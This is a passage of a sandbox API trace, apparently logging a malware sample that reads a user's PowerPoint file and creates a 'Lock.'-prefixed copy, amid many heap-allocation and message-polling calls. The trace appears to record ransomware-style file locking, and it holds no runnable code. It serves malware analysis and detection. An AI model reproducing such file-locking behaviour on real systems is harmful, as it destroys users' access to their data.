dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0264.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.169] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.169] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.169] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.169] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MlLRhGX00a.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mllrhgx00a.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0264.171] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0264.171] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0264.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.MlLRhGX00a.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.mllrhgx00a.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0264.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0264.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0264.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.180] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0264.180] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xb424, lpOverlapped=0x0) returned 1 [0264.183] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0264.186] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb424) returned 0x24b7a48 [0264.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0264.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.188] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0264.189] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0264.189] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0264.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb424) returned 0x24b7a48 [0264.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb424) returned 0x24ce2a8 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0264.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.193] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0264.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0264.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.197] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.197] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.197] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 